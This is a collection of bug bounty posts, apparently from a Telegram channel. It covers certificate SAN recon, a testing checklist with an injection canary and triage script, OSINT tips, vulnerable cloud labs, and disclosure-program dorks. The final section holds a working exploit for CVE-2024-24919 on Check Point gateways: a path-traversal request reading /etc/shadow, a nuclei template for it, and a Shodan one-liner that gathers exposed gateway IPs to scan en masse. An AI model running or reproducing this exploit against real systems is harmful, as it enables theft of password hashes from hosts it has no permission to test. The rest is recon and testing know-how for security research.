Bug bounty Tips
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
5 834 subscribers
Subject Alternative Name (SAN)
Subject Alternative Name (SAN) is an X.509 extension that lets a certificate carry identities beyond the subject's Common Name. These values, or Names, include DNS names, IP addresses, email addresses, URIs, directory names and more. For recon the DNS names are the interesting part: a single certificate often lists hostnames (staging, internal, long-forgotten ones) that subdomain brute-forcing never turns up.
OpenSSL
true | openssl s_client -connect example.com:443 -servername example.com 2>/dev/null | openssl x509 -noout -text | perl -l -0777 -ne '@names=/\bDNS:([^\s,]+)/g; print join("\n", sort @names);'
Parameters
s_client: SSL/TLS client program. `true |` closes its stdin so it exits after the handshake instead of waiting for input.
-servername: sends the hostname via SNI, so a server hosting several sites returns the certificate for this one rather than its default (older OpenSSL versions do not send SNI unless told to).
x509: parses the certificate that s_client printed (rather than a certificate request).
-noout: inhibits output of the encoded (PEM) certificate.
-text: prints the certificate in human-readable form; the perl one-liner then collects every DNS: entry from that text and prints them sorted.
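The same pipeline in Python, as an added example that is not part of the original tip: it shells out to the openssl commands above (with -servername for SNI), parses only the Subject Alternative Name block of the `x509 -text` output instead of grepping the whole dump (which would also pick up CRL/OCSP URIs and Name Constraints), and filters the names down to the apex domain that is in scope. SAMPLE_X509_TEXT is a constructed excerpt of `openssl x509 -noout -text` output; its hostnames and CA URL are placeholders, not real certificate data.

```python
"""Extract Subject Alternative Names from a TLS certificate (added example)."""
import re
import subprocess
from typing import Dict, List

# One SAN entry: type, colon, value (values never contain whitespace or commas).
SAN_ENTRY = re.compile(r"\b(DNS|IP Address|email|URI):([^\s,]+)")


def fetch_cert_text(host: str, port: int = 443, timeout: int = 10) -> str:
    """Return `openssl x509 -noout -text` for the leaf certificate at host:port.

    Same as the tip's one-liner: stdin is closed (input=b"") so s_client exits
    after the handshake, and -servername makes SNI virtual hosts answer with
    their own certificate. Needs the openssl binary and network access, so the
    offline test does not exercise it.
    """
    client = subprocess.run(
        ["openssl", "s_client", "-connect", f"{host}:{port}", "-servername", host],
        input=b"", capture_output=True, timeout=timeout, check=False,
    )
    x509 = subprocess.run(
        ["openssl", "x509", "-noout", "-text"],
        input=client.stdout, capture_output=True, timeout=timeout, check=True,
    )
    return x509.stdout.decode()


def san_block(x509_text: str) -> str:
    """Return only the lines nested under 'X509v3 Subject Alternative Name'.

    The block is delimited by indentation: its values are indented deeper than
    the extension header, and the next header returns to the header's indent.
    """
    lines = x509_text.splitlines()
    for i, line in enumerate(lines):
        if "Subject Alternative Name" in line:
            header_indent = len(line) - len(line.lstrip())
            body = []
            for nxt in lines[i + 1:]:
                if not nxt.strip() or len(nxt) - len(nxt.lstrip()) <= header_indent:
                    break
                body.append(nxt)
            return "\n".join(body)
    return ""


def san_entries(x509_text: str) -> Dict[str, List[str]]:
    """SAN values grouped by type (DNS, IP Address, email, URI), de-duplicated and sorted."""
    found: Dict[str, set] = {}
    for kind, value in SAN_ENTRY.findall(san_block(x509_text)):
        found.setdefault(kind, set()).add(value)
    return {kind: sorted(values) for kind, values in found.items()}


def san_dns_names(x509_text: str) -> List[str]:
    """What the perl one-liner prints: sorted unique DNS names, wildcards included."""
    return san_entries(x509_text).get("DNS", [])


def in_scope(names: List[str], apex: str) -> List[str]:
    """Keep the apex domain and its subdomains; a wildcard counts for its base name."""
    keep = []
    for name in names:
        base = name[2:] if name.startswith("*.") else name
        if base == apex or base.endswith("." + apex):
            keep.append(name)
    return keep


# Constructed excerpt of `openssl x509 -noout -text` output (placeholder names).
SAMPLE_X509_TEXT = """\
Certificate:
    Data:
        X509v3 extensions:
            X509v3 Subject Alternative Name:
                DNS:www.example.com, DNS:example.com, DNS:*.api.example.com, DNS:cdn.example.net, IP Address:203.0.113.10
            X509v3 CRL Distribution Points:
                Full Name:
                  URI:http://crl.ca.example/leaf.crl
"""


if __name__ == "__main__":
    import sys
    host = sys.argv[1] if len(sys.argv) > 1 else "example.com"
    for name in in_scope(san_dns_names(fetch_cert_text(host)), host):
        print(name)
```

Run it as `python3 san.py target.example` to print the in-scope DNS names of the served certificate; in_scope keeps `*.api.example.com` for apex `example.com` but drops `cdn.example.net`, which belongs to someone else's scope.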
Starting on a new target #bugbounty #bugbountytips
First of all, is port scanning in scope? If yes, port scan
Look for webservers
Try to find subdomains
Try to find other webservers on said server
Try to do content discovery
Try to do dorking on found from before
Try to find anything on github related
Try to take screenshots with something like aquatone
Try to look at any kind of custom login pages, try content discovery more
Try to look for any register on site and IDOR
Try to look for XSS (and template injection) by putting at least '"><img src=x>${{7*2}} into every field you can
Try to look for SQLi with the same payload, watching for SQL errors in the responses
You can use payload lists to fuzz these inputs
Check that CSRF tokens are present on every form that needs one and that the server actually verifies them (remove or alter the token and resubmit)
Change GET to POST and the reverse, or try PUT or DELETE on the endpoint
NoSQLi? XXE?
Any open redirects?
Throw some LFI and RFI payloads into the mix!
And the best of all? Business logic!
Found an API?! YES! LETS GO!!
Stay tuned for my API hacking post and let me know what I missed <3
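The response-side half of the XSS/SSTI/SQLi steps above, as an added example (not code from the original post): classify() takes one response body and reports whether the canary '"><img src=x>${{7*2}} came back unencoded (XSS candidate), HTML-escaped (encoded), with the template expression evaluated to 14 (SSTI candidate), or alongside a database error string (SQLi candidate). The bodies in SAMPLE_RESPONSES and the injection-point labels are constructed, not captured from any site, and the SQL error fragments are a starting list, not a complete one.

```python
"""Triage responses to the reflection canary from the checklist (added example)."""
import html
import re
from typing import Dict, List

# '"> breaks out of attribute and tag context, <img src=x> is an inert marker tag,
# ${{7*2}} probes both ${...} and {{...}} template syntaxes with one string.
CANARY = "'\"><img src=x>${{7*2}}"
STATIC_PREFIX = CANARY.split("$")[0]   # the part a template engine leaves untouched

# Error fragments from common databases. One of these after a quote-bearing probe
# is a lead to confirm with a proper SQLi test, not proof by itself.
SQL_ERROR_RE = re.compile(
    r"You have an error in your SQL syntax"           # MySQL / MariaDB
    r"|unterminated quoted string"                     # PostgreSQL
    r"|Unclosed quotation mark after"                  # MSSQL
    r"|ORA-\d{5}"                                      # Oracle
    r'|SQLITE_ERROR|near "[^"]*": syntax error',       # SQLite
    re.IGNORECASE,
)


def classify(body: str) -> List[str]:
    """Return the findings for one response body (empty list = nothing of interest)."""
    findings = []
    if CANARY in body:
        findings.append("xss-candidate: probe reflected unencoded")
    elif html.escape(CANARY, quote=True) in body:
        findings.append("encoded: probe reflected HTML-escaped")
    # If the engine evaluated {{7*2}} the body holds '$14' (Jinja2/Twig style) or
    # '14' (${...} style) right after the static prefix, whether or not that
    # prefix was HTML-escaped on the way out.
    for prefix in (STATIC_PREFIX, html.escape(STATIC_PREFIX, quote=True)):
        if prefix + "$14" in body or prefix + "14" in body:
            findings.append("ssti-candidate: template expression evaluated to 14")
            break
    if SQL_ERROR_RE.search(body):
        findings.append("sqli-candidate: database error message in response")
    return findings


def triage(responses: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each injection point to its findings; points with none are dropped."""
    result = {}
    for point, body in responses.items():
        findings = classify(body)
        if findings:
            result[point] = findings
    return result


# Constructed responses, one per injection point (labels are illustrative).
SAMPLE_RESPONSES = {
    "GET /search?q=":      "<p>No results for '\"><img src=x>${{7*2}}</p>",
    "POST /comment body=": "<p>Posted: &#x27;&quot;&gt;&lt;img src=x&gt;${{7*2}}</p>",
    "POST /profile name=": "<h1>Hello '\"><img src=x>$14</h1>",
    "POST /login user=":   "Warning: mysql_query(): You have an error in your SQL syntax",
    "GET /about":          "<p>Static page, nothing echoed.</p>",
}


if __name__ == "__main__":
    for point, findings in triage(SAMPLE_RESPONSES).items():
        print(point, "->", "; ".join(findings))
```

Feed it the bodies you collect while submitting the canary (Burp's Logger export or a plain dict of point -> body) and the output is a short list of where to spend manual effort first; an "encoded" result still deserves a look if the reflection lands inside a script block or an attribute that the escaper does not cover.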
30 tips on using OSINT for bug hunting:
1. Use Google Dorks to find vulnerabilities in web applications.
2. Use Shodan to find vulnerable IoT devices.
3. Use WHOIS to find registration information about domain names.
4. Use Maltego to visualize relationships between entities.
5. Use the Wayback Machine to find old versions of websites.
6. Use social media to gather information about targets.
7. Use LinkedIn to gather information about employees.
8. Use GitHub to find sensitive information in code repositories.
9. Use Google Alerts to monitor for mentions of your target.
10. Use DNSDumpster to map out a target's infrastructure.
11. Use Recon-ng to automate OSINT tasks.
12. Use theHarvester to gather email addresses and other information.
13. Use SpiderFoot to automate OSINT tasks and gather intelligence.
14. Use FOCA (Fingerprinting Organizations with Collected Archives) to gather metadata from documents.
15. Use VirusTotal to scan files for malware; its domain and IP reports also list passive DNS resolutions and subdomains for a target.
16. Use Censys to find vulnerable systems on the internet.
17. Use Foca Pro to extract metadata from documents and analyze it.
18. Use FOCA Online to extract metadata from documents and analyze it in the cloud.
19. Use FOCA Free Edition for basic metadata extraction from documents.
20. Use Metagoofil to extract metadata from documents and analyze it.
21. Use Datasploit for automated OSINT tasks and data mining.
22. Use Google Hacking Database (GHDB) for advanced Google searches.
23. Use Google Custom Search Engine (CSE) for targeted searches on specific websites or domains.
24. Use Google Advanced Search for advanced searches on Google.
25. Use Google Trends to monitor trends related to your target or industry.
26. Use Google Analytics and AdSense tracking IDs (UA-/G-/pub-) found in a site's page source to pivot to other sites run by the same owner.
27. Use Google Ads Keyword Planner (formerly AdWords) for keyword research related to your target or industry.
28. Use Google PageSpeed Insights to list the third-party scripts and hosts a page loads; that is fingerprinting input, not a vulnerability scan.
29. Google Search Console (formerly Webmaster Tools) only reports on properties you have verified, so it does not apply to a target you do not control.
30. Use the target's public Google Business profile (addresses, phone numbers, photos) to map its physical footprint.
Repost from Free Hacking Resources (Без вождя)
🌩 Pentest in the clouds❤️
• Cloud platforms are a convenient way to build infrastructure for applications and services. Companies and independent developers move their projects to AWS or Azure, often without thinking about security, and that is a mistake.
• I will share some resources (known vulnerable labs) that will help pentesters, specialists and enthusiasts gain practical experience in finding vulnerabilities in cloud applications deployed on Google Cloud, AWS or Azure. The resources contain practical and theoretical material:
• FLAWS;
• FLAWS2;
• CONVEX;
• Sadcloud;
• GCP Goat;
• Lambhack;
• caponeme;
• CloudGoat;
• Thunder CTF;
• CloudFoxable;
• IAM Vulnerable;
• AWS Detonation Lab;
• OWASP WrongSecrets;
• OWASP ServerlessGoat;
• AWS S3 CTF Challenges;
• The Big IAM Challenge by Wiz;
• AWS Well Architected Security Labs;
• Damn Vulnerable Cloud Application;
• CdkGoat - Vulnerable AWS CDK Infrastructure;
• Cfngoat - Vulnerable Cloudformation Template;
• TerraGoat - Vulnerable Terraform Infrastructure;
• AWSGoat - A Damn Vulnerable AWS Infrastructure;
• AzureGoat - A Damn Vulnerable Azure Infrastructure;
• Breaking and Pwning Apps and Servers on AWS and Azure.
Posted by @TheGodEye
🔎 Uncovering the Hidden Gems: 40 Google Dorks for Bug Bounty Programs
site:example.com inurl:bug inurl:bounty
site:example.com inurl:security intext:bounty
site:example.com inurl:security ext:txt
site:example.com inurl:responsible-disclosure
site:example.com inurl:/.well-known/security
site:example.com intext:bug bounty program
site:example.com intext:responsible disclosure program
site:example.com intext:vulnerability disclosure program
site:example.com intext:security rewards
site:example.com intext:bug bounty payout
site:example.com inurl:security ext:txt -inurl:hackerone -inurl:bugcrowd -inurl:synack
site:example.com inurl:responsible-disclosure -inurl:hackerone -inurl:bugcrowd -inurl:synack
site:example.com intext:bug bounty -inurl:hackerone -inurl:bugcrowd -inurl:synack
inurl:/security
inurl:/responsible-disclosure/ swag
inurl:'/responsible disclosure' hoodie
responsible disclosure hall of fame
inurl:responsible disclosure $50
responsible disclosure europe
responsible disclosure white hat
white hat program
responsible disclosure r=h:nl
responsible disclosure r=h:uk
responsible disclosure r=h:eu
responsible disclosure bounty r=h:nl
responsible disclosure bounty r=h:uk
responsible disclosure bounty r=h:eu
responsible disclosure swag r=h:nl
responsible disclosure swag r=h:uk
responsible disclosure swag r=h:eu
responsible disclosure reward r=h:nl
responsible disclosure reward r=h:uk
responsible disclosure reward r=h:eu
"powered by bugcrowd" -site:bugcrowd.com
"submit vulnerability report"
"submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone"
intext:"we take security very seriously"
site:responsibledisclosure.com
inurl:'vulnerability-disclosure-policy' reward
site:..nl intext: security report reward
For this vulnerability, just search Shodan:
title:"Check Point" ssl:"target"
CVE-2024-24919
POST /clients/MyCRL HTTP/1.1
Host: target
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow
#SSLVPN #BugBounty
CVE-2024-24919
Check Point Remote Access VPN 0-day
FOFA link
POC:
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow
#0day #checkpoint
Check Point - Wrong Check Point (CVE-2024-24919)
Grabbed the IP addresses using Shodan and then fed them to the nuclei template below:
id: CVE-2024-24919

info:
  name: Check Point Security Gateway - Arbitrary File Read (CVE-2024-24919)
  author: Addy
  severity: high
  metadata:
    max-request: 1
    vendor: checkpoint
  tags: cve,cve2024,checkpoint

http:
  - method: POST
    path:
      - "{{BaseURL}}/clients/MyCRL"
    body: 'aCSHELL/../../../../../../../etc/shadow'

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:"
          - "cpep_user:"

      - type: status
        status:
          - 200
https://t.co/YcKOC3DqZL
Follow t.me/bugbounty_tech
One-liner for grabbing IPs from Shodan (the trailing sed strips the separator the CLI appends after the last field, leaving ip:port per line):
shodan search --fields ip_str,port 'http.title:"Check Point SSL Network Extender"' --separator ":" | sed 's/.$//' > file.txt